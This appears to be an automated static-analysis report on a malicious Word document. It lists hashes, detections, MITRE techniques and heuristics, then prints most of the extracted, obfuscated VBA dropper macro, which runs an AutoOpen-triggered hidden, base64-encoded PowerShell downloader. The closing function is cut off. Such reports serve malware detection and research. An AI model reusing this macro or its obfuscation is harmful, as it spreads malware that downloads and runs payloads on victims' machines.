Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dad9adac8808e0b0…

MALICIOUS

Office (OLE)

114.2 KB Created: 2018-05-27 19:28:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 709157dedf25ff5cee752ccbcf46e82d SHA-1: 3fe7c1e49502e7174d910bf59af05a05aadae1bf SHA-256: dad9adac8808e0b0e0aa93d9a12063e639cad6bb5116c8c89f3745af50ef38c9
230 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with legacy WordBasic markers and an AutoOpen subroutine. The macro utilizes the Shell() function to execute a PowerShell command, specifically 'powershell -windowstyle hidden -e LGAACAAJABlAG4AVgA6AGMATwBNAFMAcABlAEMAWwA0ACwAMgA1AF0ALQB', which is indicative of a downloader attempting to fetch and execute a second-stage payload. The presence of the 'Doc.Dropper.Agent-6561068-0' ClamAV detection further supports its role as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6561068-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6561068-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    OJwclIZdN = Shell(tlzzfZz + Chr(vbKeyP) + KmNiFq + NpMTGOad, vbHide)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub Autoopen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18651 bytes
SHA-256: fe0fe63abf87c7c9e9fb79f3059cc42f775472190a274539adffa221a6caf675
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wfVqzJwCDa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wjoTR()
On Error Resume Next
wthTF = (aLqAY * bEKdw - lFZAlw * Round(3052)) + (46693 - Rnd(wwKiA) + 26687 + AVcGG)
pEHYd = (EAzaqt * LAwIl - hwcPj * Round(41910)) + (45446 - Rnd(aDpBqj) + 22393 + VtNTK)
wjoTR = sivZrmm + CJRavMqha + zOAoQ + dGwpbz + YTbfZqY + ZDrNP + pBCfrRIvTSb + JakNfDNc + zvsriA + bjlCwBZfL + SKURCwT
VAWTk = (CAENqo * bNpaC - vdwIZ * Round(99992)) + (26125 - Rnd(wfDuRH) + 25246 + btNkYt)
End Function
Sub Autoopen()
On Error Resume Next
zbKCHk = (fSLNP * YrwTXJ - VASZh * Round(22497)) + (97358 - Rnd(wNRhBD) + 95415 + OzGFuz)
pTaNw (wjoTR)
jErWDj = (tNPnEz * lUvlP - EtjNnb * Round(21171)) + (64976 - Rnd(QELVO) + 66629 + ppuCA)
End Sub
Function pTaNw(NpMTGOad)
On Error Resume Next
DSOww = (dcKTi * jpXij - YOYwKb * Round(66837)) + (69581 - Rnd(QfGqNi) + 70999 + OzocnE)
GkhFis = (LGSdlv * HmQOw - zEcRh * Round(91506)) + (99648 - Rnd(iuAlK) + 60227 + audBiT)
OJwclIZdN = Shell(tlzzfZz + Chr(vbKeyP) + KmNiFq + NpMTGOad, vbHide)
AYkzp = (HMYOrr * BIPXms - jLSsbQ * Round(32000)) + (62935 - Rnd(mMNtdE) + 7109 + kGQCRW)
End Function


Attribute VB_Name = "tTkoSiGPpjno"
Function sivZrmm()
On Error Resume Next
WsDhL = (kzqkFZ * vGHLiN - WoNlMO * Round(69052)) + (13575 - Rnd(oZGKS) + 19028 + NuwuE)
vzwaYEOM = "owersHeLL -" + "WinDowsTyl" + "e hidden -e L" + "gAoACAAJABlA" + "G4AVgA6AGMATw" + "BNAFMA" + "cABlAEMAWw" + "A0ACwAM" + "gA2ACwAMg" + "A1AF0ALQB"
VLKXVL = (BZdjup * iRVzrd - CKwPOm * Round(86201)) + (87650 - Rnd(hTmYT) + 3054 + osXNBP)
qrvUkTMvwDz = "qAG8AaQ" + "BOACcAJwAp" + "ACgAIAAoACg" + "AKAAiAHsAMQA" + "0ADAAfQB7ADEAO" + "QB9AHsAMQAzADQA"
aPdciw = (zCaBT * LIGZA - HvMIQ * Round(27724)) + (56177 - Rnd(jETQtn) + 27973 + AlJJz)
HrDzubH = "fQB7ADQANA" + "B9AHsAMQAy" + "ADgAfQB7ADc" + "ANwB9AHsA" + "MgA2AH0AewA"
hRMXzA = (jlwNu * ANHMO - FsuiK * Round(14783)) + (61323 - Rnd(nIVQqK) + 30477 + vvtOc)
LTsRiGWWju = "xADEAOQ" + "B9AHs" + "AMQA0ADU" + "AfQB7ADEAMwA" + "1AH0A" + "ewA4ADQAfQB7A"
ATVCzj = (KsYvE * zmiBPT - cXPhW * Round(68846)) + (83259 - Rnd(SLTzdf) + 84623 + MHHzYd)
WBSFDYWzm = "DUANAB9AHsANQA" + "zAH0AewAxADE" + "AMwB9AHs" + "ANwA1AH0AewA0A" + "DkAfQB7ADEAM" + "wAyAH0Ae" + "wAxADAA" + "MwB9AHsANgAwAH0" + "AewA4ADgAf" + "QB7ADEAMAA0AH0"
wUmSQ = (MuduOw * DnjQoa - hFwbMH * Round(22073)) + (41919 - Rnd(HUpwIT) + 25480 + RbMGRp)
NKMXHqa = "AewAxADIAfQB7A" + "DQANwB9" + "AHsAMQA0AD" + "MAfQB" + "7ADEAMwAxAH0" + "AewAxA" + "DUANwB9AH" + "sANgA1AH0"
sivZrmm = vzwaYEOM + qrvUkTMvwDz + HrDzubH + LTsRiGWWju + WBSFDYWzm + NKMXHqa
End Function
Function CJRavMqha()
On Error Resume Next
OjPXZ = (rKzliq * LFIPq - WaZzUk * Round(51046)) + (93524 - Rnd(NOlPQr) + 24778 + snwTPJ)
NhwcV = "AewA2ADMAf" + "QB7ADYANwB9AHsA" + "NQA4AH" + "0AewAxADIAMw" + "B9AHsAOA" + "AxAH0Aew"
NZcoYL = (wPRSi * junwit - iASahw * Round(48655)) + (30954 - Rnd(ujGQhm) + 90437 + lXmvS)
uZijAVvJwb = "AxADEA" + "MAB9AHsAOAA3AH0" + "AewA5AH0AewAxA" + "DIAOQB9AHsAMQ"
wzMXz = (zwpWMJ * HBHam - UVkMN * Round(14989)) + (89681 - Rnd(jMGGBQ) + 57424 + dUaZS)
bMjrKqip = "AwADEAfQB" + "7ADEAMAA3A" + "H0AewAxADI" + "ANgB9"
vrkEYY = (FizAsz * NkzPE - TliQKs * Round(68311)) + (75659 - Rnd(nAMks) + 48660 + cIjVLa)
kMzdOvm = "AHsAMQAwADUA" + "fQB7ADMA" + "NAB9AHsAMQA" + "2AH0AewAxAD" + "gAfQB7" + "ADcAfQB7ADE" + "AMQB9AHsAOA"
JFJTcG = (UKUTIK * TufpA - qznIEb * Round(38460)) + (16541 - Rnd(jjmtCZ) + 20233 + ZGjfS)
HkjrvquYbA = "A1AH0A" + "ewAxAH0A" + "ewAxADQAOQB9A" + "HsANgA4A" + "H0Aew" + "A3ADgAfQB7A" + "DEAMgA3A" + "H0Aew" + "AxADUAfQ"
rQkOkI = (DjLsr * RAPBm - iiljOH * Round(68322)) + (17985 - Rnd(GiTBYH) + 92963 + TMjAbc)
mVOkLNIBX = "B7ADMAOAB9AHsA" + "NwAwA" + "H0AewAyADcAf" + "QB7ADEAMgAxAH0" + "AewAxA" + "DUAMAB"
bBKNs = (KFuvo * FjWGB - WzzrqT * Round(8533)) + (41200 - Rnd(voDjC) + 3185 + FNwWQr)
nVSuDpRjmTc = "9AHsAMQA1ADM" + "AfQB7AD" + "IAMAB9AHs" + "AMQAzADkAfQB7AD" + "cANgB9AHsAMg" + "AzAH0AewAyAD"
CJRavMqha = NhwcV + uZijAVvJwb + bMjrKqip + kMzdOvm + HkjrvquYbA + mVOkLNIBX + nVSuDpRjmTc
End Function
Function zOAoQ()
On Error Resume Next
dZGjwq = (zGiBF * EjKrIX - OQrLmJ * Round(43031)) + (58552 - Rnd(JiiiB) + 38478 + kkHiB)
hNHzLaYak = "kAfQB7ADQ" + "AfQB7ADEA" + "NAB9AHsANw" + "A0AH0" + "AewAzAH0A"
iUiwWi = (CFNtA * NhuwnU - owDSbd * Round(70976)) + (32416 - Rnd(HAsqQi) + 43036 + qnrIGE)
tHUbdYK = "ewAxADQANAB9AH" + "sAMQA0ADYAf" + "QB7ADUA" + "MAB9AHsAM" + "gA0AH0" + "AewA5ADEAfQB7AD" + "EANAA3AH0AewA" + "xADMANgB9AHsAN"
piTGk = (nUKXJl * PVstE - wMAJRi * Round(21998)) + (32565 - Rnd(zcUhs) + 73721 + zKdfkT)
SsOkwNUlcET = "AAxAH0Aew" + "A2ADEAfQB7AD" + "gAMgB9AH" + "sANAAzAH" + "0AewAxA" + "DQAMgB9AHsAM" + "QAxADQAfQB7ADY" + "ANgB9AHsAMwAyA" + "H0AewA4ADk" + "AfQB7ADQANQB9AH"
iSGwEN = (uwDiF * oUCcZ - jUiDc * Round(86812)) + (59844 - Rnd(YiPZri) + 63099 + rKhGD)
KvrOtJ = "sANQA1AH" + "0AewA1AH0AewA3" + "ADMAfQB7ADgA" + "MwB9AHsAMQAxAD" + "IAfQB7ADEAM" + "AAwAH0AewA3A"
FdRCni = (cHBGLn * zPiDZ - wMiina * Round(45224)) + (41980 - Rnd(suSVuP) + 8397 + ZFzzvb)
kGHfM = "DIAfQB7AD" + "EAMwAwA" + "H0AewA" + "0ADIAfQB7ADUAN"
SfrVS = (jijcpt * mOMKTz - Hnqsv * Round(91273)) + (56295 - Rnd(zcdBk) + 40121 + IiBCB)
AIovOkaiKFz = "wB9AHsAMwAzAH0" + "AewAxADUANQB" + "9AHsAMQAxADcAf" + "QB7ADUA" + "MgB9AHsA" + "NwAxAH0AewAy" + "ADUAfQB7ADUAO" + "QB9AHsAOQA4A" + "H0AewA2ADIAfQB"
QmsFV = (zKtmi * MGfpzZ - wbjEz * Round(76161)) + (16352 - Rnd(aGiIQw) + 5662 + BzmZmd)
aAMQihwFNri = "7ADYAfQB7ADIAfQ" + "B7ADMANgB9AHs" + "AMQAyA" + "DUAfQB7ADEANQA"
EqwFYN = (TibfCk * itSNjZ - OdOzJ * Round(30891)) + (57642 - Rnd(MAlUjc) + 26774 + ijMtm)
oiHwGFTKS = "2AH0AewAyADEAfQ" + "B7ADEAMgAyAH0" + "AewAxADMAN" + "wB9AHsAM" + "wA1AH0AewAxADE" + "AOAB9A" + "HsAMQAzA" + "H0AewAxADAAOQB" + "9AHsAMQA0ADgA"
jkvSHS = (UMCEq * MkHPzC - WbuhEH * Round(39144)) + (85568 - Rnd(dXfRTz) + 57124 + rILns)
RjjDCc = "fQB7ADkAMAB9AHs" + "AMQAzADMAf" + "QB7ADEA" + "MgA0AH" + "0AewAyADgAfQB"
iQqmBQ = (TOqLZE * NNzwLk - fYZWOG * Round(10698)) + (47693 - Rnd(roioLR) + 27077 + ScJKI)
GSvDpDuvw = "7ADQA" + "MAB9A" + "HsAMQAxADEA" + "fQB7ADAAfQB7ADE" + "AMQA2AH0AewAxA" + "DUAMQB9AHsAOAA" + "wAH0AewAxADAAfQ" + "B7ADMANwB9AHsAM" + "QAzADgAfQB7AD"
zOAoQ = hNHzLaYak + tHUbdYK + SsOkwNUlcET + KvrOtJ + kGHfM + AIovOkaiKFz + aAMQihwFNri + oiHwGFTKS + RjjDCc + GSvDpDuvw
End Function
Function dGwpbz()
On Error Resume Next
Fusnod = (MbHEC * QQmJUu - wWvQi * Round(93038)) + (99556 - Rnd(fjaYWk) + 37688 + WTQvjf)
PizUYPMW = "UANgB9AHsANgA" + "0AH0Ae" + "wAzAD" + "AAfQB7ADkA"
WjIZz = (fTpPj * jwbIsd - jrjjfH * Round(94214)) + (76557 - Rnd(pDzsT) + 16549 + hVWCZ)
uqwhP = "OQB9AHsAOQAzAH0" + "AewAxA" + "DUAMg" + "B9AHsAMwAxA" + "H0AewA"
QlJnu = (dvKYSC * VqCdSA - PdlPq * Round(42786)) + (52102 - Rnd(tnVbDj) + 52787 + XsMNKU)
CYPVATD = "zADkAfQ" + "B7ADE" + "AMQA1AH0AewA" + "xADAA" + "OAB9A"
ihqUmi = (sDBIkm * twYIC - XDrwS * Round(89484)) + (91408 - Rnd(kFnGvw) + 12628 + ABosPu)
FBcfL = "HsAOQAyA" + "H0AewAxADQA" + "MQB9A" + "HsAOQA2AH0AewA" + "xADcA" + "fQB7AD"
dGwpbz = PizUYPMW + uqwhP + CYPVATD + FBcfL
End Function
Function YTbfZqY()
On Error Resume Next
Zvvou = (voEHTH * qrCsmw - wOCpo * Round(88187)) + (20924 - Rnd(WUKmcl) + 33997 + WFBCo)
QzHMlFiIE = "kANAB9AHsAMQA" + "wADIAfQB" + "7ADkA" + "NwB9AH" + "sANAA2AH0AewAxA"
jwbqi = (IwwFQm * KsGAA - zSjzh * Round(60658)) + (81282 - Rnd(ofmlw) + 37640 + fDNzOS)
BUvSODncPii = "DIAMAB9AHsAO" + "QA1AH0AewAxA" + "DUANAB9A" + "HsANAA4AH0AewA1"
XXFVpS = (KQFAj * wzBuKo - UTKTT * Round(36663)) + (72709 - Rnd(psClAL) + 89509 + rLpYR)
PsLzdNtkn = "ADEAfQB7ADcAOQ" + "B9AHsAOA" + "B9AHsANgA5AH0A" + "ewAyA" + "DIAfQ"
PhkMij = (BTmawT * NlCWj - VXCPjd * Round(7596)) + (75431 - Rnd(jVQCq) + 6959 + jGoCzn)
TvuWHPMUZKd = "B7ADEAMAA2AH" + "0AewA4A" + "DYAfQAiAC0AZg" + "AgACcAQQBEA" + "EMAWAAnAC" + "wAJwBhAHMAZA" + "AuAG4AZQAnACw"
PKCrq = (GISsqI * iUdBfs - jRKvdA * Round(71260)) + (4204 - Rnd(idbhzm) + 8827 + lNpDaC)
UdSlPwPBq = "AJwBsAGk" + "AYwAgACsA" + "IABSA" + "DEAJwA" + "sACcA" + "LwBAAGgAdAB0AHA" + "AJwAsACcAbQAuAG"
LhLwO = (nXGwpz * GOpME - kOPbu * Round(84153)) + (31525 - Rnd(QRDoJP) + 72514 + vpmnSv)
XwFQh = "IAcgAvA" + "EcAZwBDAC" + "cALAAnAG8AbQA" + "vAEkAcQAnACwAJw" + "A9ACAARgBoAGYA" + "ZQBuAHYAOgBwAH" + "UAYgAnACwAJwBGA" + "CcALAAnAE4" + "AJwAsA"
UkHoD = (WYczNR * vFRGz - XGDIji * Round(29314)) + (42865 - Rnd(zaQup) + 16421 + qmCMVt)
krisXTw = "CcALQAnACwAJwBZ" + "AFUAJwAsACc" + "AaABmAC" + "cALAAnAGgA" + "ZgBZACcALAAn" + "ADEAJwAsACcA" + "bABjACc"
bovwbo = (XjplXz * cbGoE - YCjSb * Round(2467)) + (1280 - Rnd(fDlLd) + 26315 + Tljnic)
Onqvs = "ALAAnAGoAJwAsAC" + "cALgBX" + "AGUAYgBDAGwA" + "JwAsA" + "CcAYwAnA" + "CwAJw" + "BpAGUAbgB0ADs"
taIRIi = (LvYRp * ZFcWa - bscEau * Round(73139)) + (79198 - Rnd(pWBWb) + 94081 + IKKsW)
IofSF = "ARgBoAGYA" + "TgBTAEIAI" + "AA9ACAAJw" + "AsACcAZg" + "AnACwAJwB" + "tACcALAAnAGYAT"
YTbfZqY = QzHMlFiIE + BUvSODncPii + PsLzdNtkn + TvuWHPMUZKd + UdSlPwPBq + XwFQh + krisXTw + Onqvs + IofSF
End Function
Function ZDrNP()
On Error Resume Next
THMuo = (CNINMu * jRVhX - pEVYX * Round(89761)) + (25308 - Rnd(RwSMi) + 32920 + ZUrjF)
qzdvaOvBnqm = "gBTAE" + "IAIAArACAAKABSA" + "CcALAAnAHIAZQB" + "hACcALAAnAGE" + "AcwAnACwAJwB" + "oAG8A" + "dAAnACwAJw"
mvhJob = (NqncmV * zwipzb - lRpAi * Round(56704)) + (53509 - Rnd(wdBSi) + 4539 + oPiSm)
cGowjQ = "AxAE4A" + "QABSADEA" + "TgAnA" + "CwAJwB" + "SADEA" + "JwAsACc" + "AdwAnA"
aJqZM = (calChd * BirIJ - wDtJbU * Round(82652)) + (59530 - Rnd(KTGjpO) + 19838 + zbStz)
ldSTcjM = "CwAJwAoAEYAaAB" + "mAGEA" + "cwBmAG" + "MAIABp" + "AG4AJ" + "wAsACcALgBjA" + "G8AJwAs" + "ACcAT" + "wBhAG"
LbToJA = (wGZUoF * zPFVEm - SvAoG * Round(83296)) + (43646 - Rnd(hrEwUi) + 66315 + fhiLO)
uzzOUr = "QARgBJAG8" + "AJwAsACcAZgAnAC" + "wAJwBsAHoAS" + "wAnACw"
hLBJd = (kVwoM * tfSAC - GDZhP * Round(78979)) + (69813 - Rnd(RHaoab) + 4301 + OonzO)
rbTiPpOHaK = "AJwB0AE0AJw" + "AsACcATg" + "BlAHQAJwAs" + "ACcALgBlAC" + "cALAAnAE4A" + "cwBKAGsAUgA" + "xAE4AJwAsAC" + "cALgAw" + "AE4AYwBEAG8AJwA"
ZDrNP = qzdvaOvBnqm + cGowjQ + ldSTcjM + uzzOUr + rbTiPpOHaK
End Function
Function pBCfrRIvTSb()
On Error Resume Next
ILvPm = (pDoii * EKnzv - Yircv * Round(16117)) + (27319 - Rnd(QoQdMF) + 91078 + uNmACi)
OfrUHtD = "sACcAYwAnACw" + "AJwBjAC4AM" + "AAnACwAJwAgAC" + "cALAAnAG8AJ" + "wAsACc"
NSvJF = (rRPsb * jXjQm - AlBmK * Round(34638)) + (48867 - Rnd(MPaNv) + 17301 + VdJAwI)
SzCiNbmqdT = "AYQBjA" + "G8AZABlACcAL" + "AAnAG" + "sAJwAsACcA"
ZWBkl = (MVOzzw * zHbId - jKbqCz * Round(35511)) + (66229 - Rnd(uWPnt) + 72298 + ilZjt)
XCjrtTQ = "YQBkAGEAcwAnACw" + "AJwAvA" + "EAAJwAsACcAUgAx" + "ACcALAAnAFkAVQA" + "nACwAJwBv" + "AFIAMQBO" + "ACsAUgA" + "xAE4AawA" + "nACwAJwArACcA" + "LAAnAC8AJwAs"
rBdNz = (tOBBX * cEzjz - Tzwash * Round(22917)) + (10332 - Rnd(kcqiw) + 82902 + TaNoz)
AbjQGD = "ACcAUgAxAE4AKwB" + "SADEATgBlAC0AS" + "QAnACwAJwB" + "SADEATgAuAFM" + "AcABsA" + "GkAdAAoACcALAA" + "nADEATgArAFIAMQ" + "BOAHcALQBvAGI" + "AJwAsACcATgBl"
pwsVs = (RhOwl * NvOQJw - rpIlL * Round(36339)) + (50873 - Rnd(IlWSK) + 76382 + IAiWo)
GpYSFQGrpzh = "AFIAJwAsAC" + "cAaAB0AHQAcA" + "A6AC8ALwBk" + "AGEAZgBlAHI"
ojViEw = (vECRQn * WjMhC - CIvsf * Round(51866)) + (96926 - Rnd(mOimI) + 28641 + FmHGW)
NTRXCKl = "AZABp" + "AC4AYwAnACwAJw" + "AzAFcAbgB" + "sACcALAAnAH" + "IALgBtAGU" + "ALwAnACwA" + "JwAxAE4AKwB" + "SADEA" + "JwAsACcAK" + "QAnACwAJwB0ACcA"
bEiFCW = (kbnAUV * fndwdz - IpUfIY * Round(8615)) + (31194 - Rnd(FafbaD) + 26324 + dESVKb)
mCDdLj = "LAAnAC4AJwAsACc" + "AIAAn" + "ACwAJwBlA" + "CcALAAn" + "AG8AaAAzACc" + "ALAAnAG4AJwAsAC" + "cAcQAnA" + "CwAJwBSA"
SmiXSI = (cYOSO * ZtzbU - haouJc * Round(50320)) + (82248 - Rnd(ZfHwO) + 76083 + Wtjwl)
zrbwkdanc = "CcALAAn" + "ADAAMAAwADAALA" + "AgADIAOAAyADEAM" + "wAzACkA" + "OwBGA" + "GgAZgB" + "BACcALAAnACkAK" + "ABGAGgAZgBTA" + "EQAQwApADsAYg"
zHMIpA = (kGrAd * GdrVvr - nDtGU * Round(99962)) + (49763 - Rnd(WEuWv) + 71307 + hhBmZd)
NdKVwojA = "AnACwAJ" + "wAzACcALA" + "AnAFIAJwAsACcAb" + "gAnACwAJwBO" + "ACcALAAnAHcAe" + "AAnACwAJwB" + "jAFIAMQBOAC"
pBCfrRIvTSb = OfrUHtD + SzCiNbmqdT + XCjrtTQ + AbjQGD + GpYSFQGrpzh + NTRXCKl + mCDdLj + zrbwkdanc + NdKVwojA
End Function
Function JakNfDNc()
On Error Resume Next
TnHUUj = (iYlGTJ * NGnpaA - CzdhI * Round(57982)) + (93203 - Rnd(UISoB) + 68473 + zzftd)
RZZlV = "cALAAnAGkAJwAsA" + "CcAPQA" + "gACYAKAAnACwAJw" + "BEAEMAJwAsAC" + "cAdABlAG0AUgAx"
fJQcbi = (bNzzc * RpdnM - nVDco * Round(60734)) + (14220 - Rnd(GGoKh) + 45311 + WoNFj)
XJESkZYs = "ACcALAAnAGYAWQ" + "AnACwAJ" + "wBSADEATgAr" + "ACcALAAnAH" + "UAJwAsACcAMwBKA" + "DMAVQAnACwA" + "JwAxACcALAAn" + "AG4AcwBhAGQA"
ciHLSL = (SQWLTq * WcjcwU - NUYnS * Round(10146)) + (3761 - Rnd(BPifGK) + 74354 + RVUdsq)
GaFnRrlEaN = "JwAsACcAfQB9" + "ACcALAAn" + "AE4AJwAsACcAU" + "gAxAE4AKQA" + "gAHIAYQ"
crqhzt = (lIMZP * iXAGc - OGdnk * Round(60836)) + (68967 - Rnd(PGcriW) + 70107 + wbXCBu)
ZTwEljb = "BuAGQAJwAs" + "ACcAMgAnACwA" + "JwBOACcALAA" + "nAGUAJwAsACcAd" + "AByAG8AaAAzAG"
ZShuYN = (VNBWbd * DGBPNs - jVusdm * Round(52098)) + (47369 - Rnd(ZVUcDV) + 4820 + KSVlOq)
EAVScGiU = "kAJwAsA" + "CcARgBoAGYAYQ" + "AnACwAJwAoAC" + "kAJwAsACcASQ"
vHwtU = (nnBAt * mCvbSw - bAGBvi * Round(8121)) + (33016 - Rnd(uWtSf) + 74233 + WphDMm)
GfMmIuk = "BuACcALA" + "AnAE4AJwAsAC" + "cAQwApADsA" + "JgAoACcAL" + "AAnADs" + "ARgBoAGYAU"
SbKYPi = (rCoiO * oFBLQ - itiHb * Round(34010)) + (186 - Rnd(ZlktT) + 78839 + nZlJo)
MNmsQc = "wBEAEMAJwAsAC" + "cAaAAzAG" + "wAZQAwAE4A" + "YwAoA" + "CcALAAnAC8A" + "LwAnACwAJ" + "wBqAGUAY"
pDUEjQ = (IQoWnH * onUjG - dqFRv * Round(30457)) + (49374 - Rnd(AjPBcW) + 87540 + KCsAVv)
nkUCAnvY = "wAnACwAJwAs" + "ACAARgBoA" + "GYAUwBEACcAL" + "AAnAE4" + "AJwAsACcAbw" + "BtADsA"
JakNfDNc = RZZlV + XJESkZYs + GaFnRrlEaN + ZTwEljb + EAVScGiU + GfMmIuk + MNmsQc + nkUCAnvY
End Function
Function zvsriA()
On Error Resume Next
zOFLl = (AECDYE * zCITrq - jYVKl * Round(19711)) + (97783 - Rnd(RrFuih) + 15661 + pEoKA)
coqiRJr = "RgAnA" + "CwAJw" + "BtAC4AJwAsACcA" + "awA7AH0AYwB" + "hAHQAYwBo" + "AHsAJwAs" + "ACcAdABS" + "ADEATgApACAAUw" + "B5ACc"
NzDRus = (tYJin * Ytuaa - WmLziW * Round(34366)) + (79816 - Rnd(TOCfHH) + 21940 + HUPGV)
LdKNudhm = "ALAAnA" + "GMAVABvA" + "FMAJwAsACcATg" + "BlAFIAJwAsACcA" + "UgAxAC" + "cALAAnA" + "EYAaABmACcALAA" + "nAGUAYQAvAEAAa" + "AB0AH"
SvPuI = (KuiNid * CzZucC - aJHzf * Round(32706)) + (25657 - Rnd(nFLYB) + 27973 + COcJGp)
MWbfYVVilZd = "QAcAA6ACcA" + "LAAnAGoAZ" + "QAnACw" + "AJwBsACcALAAnA" + "E4AJwAsAC" + "cAKQB7AHQAcgB" + "5AHsAJwAsACcA" + "YgBjAC8AJwAsACc"
kpAdS = (XiZnE * zIoQP - WoHYCG * Round(55616)) + (51524 - Rnd(zKSSw) + 36441 + ZSwBw)
kwGCsIALz = "AeABSADEATgAr" + "AFIAJwA" + "sACcA" + "TgBuAFI" + "AMQAnA" + "CwAJwBOACcAL" + "AAnAGUAYgAu" + "AGMAbwAnACwA" + "JwAxACcALAAn" + "AE4AdwAnACw"
wFfXU = (QkNzNS * ARMmuA - zZXHUH * Round(89313)) + (91723 - Rnd(WSNsRq) + 3627 + ilpJZj)
fwBTjKYTQ = "AJwBmAG8Ac" + "gBlAG" + "EAYwB" + "oACcAL" + "AAnACAAJwAsACc" + "AcwB0AGUAJwA" + "sACcAWAAgAD0A" + "IABSAD" + "EATgANA" + "AoAaAB0"
FAMSk = (fDAGE * iXDMt - BrfzZ * Round(34986)) + (20054 - Rnd(TIJLh) + 51099 + KCTvcL)
snWEzBilIiK = "AHQAcAA6AC8A" + "LwAnACwA" + "JwBkAC" + "AAJwAsACcAbwB" + "iACcALAAnA" + "GkAbgBqACcAL"
zvsriA = coqiRJr + LdKNudhm + MWbfYVVilZd + kwGCsIALz + fwBTjKYTQ + snWEzBilIiK
End Function
Function bjlCwBZfL()
On Error Resume Next
rPMmN = (TUaYw * YshFbu - VsWtp * Round(47492)) + (57594 - Rnd(YVkRRK) + 58457 + QnnEs)
SsSUiOShH = "AAnAD0AIAAu" + "ACcALAA" + "nAFIAMQAnACwAJw" + "ApADsAJ" + "wAsACcAbgBzA" + "CcALAA" + "nACsAUgAnACwAJ" + "wBsAHMALgB" + "jACcALAAnA"
zhkPtC = (czsBUp * UVWNji - zqHfit * Round(84472)) + (32707 - Rnd(opPZt) + 78563 + Zfblv)
wOwOibzmUr = "E4AJw" + "AsACcAbwBoACc" + "ALAAnADQAdAB0A" + "C8AQABoAHQAdABw" + "ADoALwAvAGUA"
rQwUA = (vQZVKA * rdkOIF - fELFQ * Round(69925)) + (60778 - Rnd(ziHzA) + 53650 + qiJtLV)
UPskmEz = "bgBnAG" + "UAbgBoA" + "G8AZABlAGk" + "AZABlACcALA" + "AnAEYAaAA" + "nACwAJwBvAGgAM" + "wBOAGcAMAAnACwA" + "JwAvAGUAJ" + "wAsACcAIAA" + "nACwAJwA6A"
OTFZt = (fpQSfj * nErEQA - TrNMzX * Round(85593)) + (75379 - Rnd(EPtqi) + 80477 + AqqijH)
IPQZTrzTZ = "CcALA" + "AnAE4AJ" + "wAsACcALwAn" + "ACwAJwBkAG" + "UAYQAnAC" + "wAJwAxACcA" + "LAAnAH" + "gAdAAoA" + "DEAJwAsACcAbQ" + "AvAGwAJwAs"
pRQkL = (rFcLmh * GsZVF - nLCmtN * Round(95548)) + (25551 - Rnd(NZSDLZ) + 46500 + inhBLz)
mcQdM = "ACcAR" + "gBoACcALA" + "AnAHMAJwAsAC" + "cAaABzACc" + "ALAAnAHYAJwAsA" + "CcAdwBVA" + "GwAYQA" + "nACwAJwArAC"
hDwSlH = (VcnUF * fXWNYA - DtjWwi * Round(95431)) + (82158 - Rnd(XqcMQE) + 80132 + icjwE)
avuwOz = "AARgBoACcALA" + "AnACgAUgAxAE4" + "AJwApACkAIAAgA" + "C0AcgBlAHAAbABB" + "AEMAZQA" + "gACAAKABbA" + "GMAaAB" + "BAFIAXQAx" + "ADEANQArAFsAY" + "wBoAEEAUgB"
PrUlPL = (TdKHj * UaWCKa - FwstWb * Round(65255)) + (11130 - Rnd(wRvzET) + 60047 + wifQEN)
FHoZinw = "dADcANAAr" + "AFsAYwBoAEE" + "AUgBdADEAMAA3" + "ACkALAB" + "bAGMAaABBAFI" + "AXQA5ADIAI" + "AAgAC0"
FjPVq = (ZYVRk * waPnd - khtLk * Round(70270)) + (2722 - Rnd(tGbuWB) + 68440 + opLMPa)
uUXXsFRc = "AYwByAEUAU" + "ABMAEEAQwB" + "lACAAJwBv" + "AGgAMwA" + "nACwAWwBjAGgAQQ" + "BSAF0AOQA2ACAAI"
sZiTA = (BjuCFT * XtwfTv - Swauj * Round(68104)) + (45035 - Rnd(acQwKK) + 3407 + CQBOrZ)
rELJEN = "AAtAGMAcgB" + "FAFAA" + "TABBAEMAZQ" + "AgACAAKABbA" + "GMAaABBAFIAX" + "QA4ADIAKwBb"
bjlCwBZfL = SsSUiOShH + wOwOibzmUr + UPskmEz + IPQZTrzTZ + mcQdM + avuwOz + FHoZinw + uUXXsFRc + rELJEN
End Function
Function SKURCwT()
On Error Resume Next
sRhDDu = (jtTKEv * nkQJOG - lIIVV * Round(14480)) + (89180 - Rnd(ShXtP) + 65609 + BfTshv)
